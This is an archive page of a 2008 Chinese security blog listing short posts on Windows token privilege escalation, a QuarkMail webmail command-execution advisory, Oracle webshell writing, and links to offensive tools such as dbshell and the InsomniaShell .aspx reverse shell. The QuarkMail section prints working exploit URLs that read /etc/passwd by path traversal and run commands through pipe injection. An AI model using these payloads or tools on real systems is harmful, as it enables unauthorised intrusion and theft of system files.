月度归档： 2008年10月 | 第8页 | 鬼仔's Blog鬼仔's Blog

关于Windows的权限和一些安全问题

2008/10/13 13:21 | 鬼仔 | 技术文章 | 1 个回复

作者：刺

让我们来复习一篇我在6、7年前写的文章，真实时间已经不可考了，因为我也忘记了。

当时写这篇文章的目的是为了学习和研究NT下权限带来的一些安全问题，不过我当时没有深入进行下去。

最近出的exploit: Windows 2003 Server Token Kidnapping 问题，又是这方面的问题，与SeImpersonatePrivilege和token关系紧密。

其实NT核心里的 权限—令牌—ACL 这一体系还会有很多其他的问题，以往深究的人很少，如果想研究下去的话，可以参考下我下面这篇文章。研究方法应该类似。
阅读全文 »

Tags: Windows, 权限

快客电邮(QuarkMail)远程命令执行漏洞

2008/10/12 16:54 | 鬼仔 | 技术文章 | 2 个回复

来源：80sec

漏洞说明：快客电邮（QuarkMail）是北京雄智伟业科技公司推出的电子邮件系统，被广泛用于各个领域的电子邮件解决方案，其webmail部分使用perl cgi编写，但是80sec在其系统中发现一个重大的安全漏洞，导致远程用户可以在邮件系统上以当前进程身份执行任意命令，从而进一步控制主机或者系统。

漏洞厂商：http://www.ipmotor.com/

漏洞解析：QuarkMail错误地使用perl的open函数以打开文件，实现模板等功能，但是其对用户传入的参数没有做有效的过滤，从而导致一个命令执行漏洞。

漏洞证明：登录进入系统之后访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes

即可得到系统账户文件，访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes

即可以将/usr/bin/id文件打开执行，并且将结果返回，用户就可以利用一序列操作获得系统的完整访问权。

漏洞解决：请等待官方补丁。

Tags: QuarkMail, 漏洞

ORACLE 建立数据文件WriteWebShell

2008/10/12 15:39 | 鬼仔 | 技术文章 | 消灭0回复

作者： kj021320

转载请注明出处

其实类似ORACLE 这样强大的数据库，真没必要用到这么土的办法

SQLJ 存储过程写文件也可以，逼于无奈对方机器不支持SQLJ 还有 UTL_FILE包也被干掉了？

那也可以使用以下我说的这个方式
阅读全文 »

Tags: Oracle, WebShell

Dbshell

2008/10/12 15:36 | 鬼仔 | 工具收集 | 7 个回复

来源：WEB安全手册

DB_OWNER权限备份hta到启动项提权的小工具。

下载地址：http://dl.getdropbox.com/u/216079/dbshell.exe

Tags: DB_OWNER, hta

MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)

2008/10/12 15:31 | 鬼仔 | 工具收集 | 1 个回复

EMR_SETICMPROFILEA Heap Overflow DOS

By Ac!dDrop

related to MS08-046

Tested on windows Xp professional Sp2
mscms.dll 5.1.2600.2709
gdi32.dll 5.1.2600.2818
阅读全文 »

Tags: MS08-046, PoC

MS Windows GDI+ Proof of Concept (MS08-052) #2

2008/10/12 15:30 | 鬼仔 | 工具收集 | 1 个回复

—————————————————————————————–
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180

Credit:

John Smith,
Evil Fingers

GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt

PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt

http://www.evilfingers.com/patchTuesday/PoC.php
========================================================================
阅读全文 »

Tags: GDI+, MS08-052

MS Windows Token Kidnapping本地提权的解决方案

2008/10/11 13:54 | 鬼仔 | 技术文章 | 消灭0回复

作者：刺

昨天放出来的exp让大家狠狠的爽了一把吧，听说有人连续提权了十多台webshell的。

今天MS更新了安全公告

这个漏洞是由于在NetworkService 或者 LocalService 下运行的代码，可以访问同样是在 NetworkService 或者 LocalService 下运行的进程，某些进程允许提升权限为LocalSystem。

对于IIS，默认安装是不受影响的，受影响的是你的ASP.NET代码是以 Full Trust 运行，如果权限低于 Full Trust，也不会受影响。老的Asp 代码不受影响，只有 ASP.NET才受影响。
阅读全文 »

Tags: Token Kidnapping, Windows 2003

InsomniaShell is a tool for use during penetration tests, when you have ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either a reverse shell or a bind shell.

It has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation. InsomniaShell.zip

Tags: WebShell

鬼仔's Blog

2008年10月的日志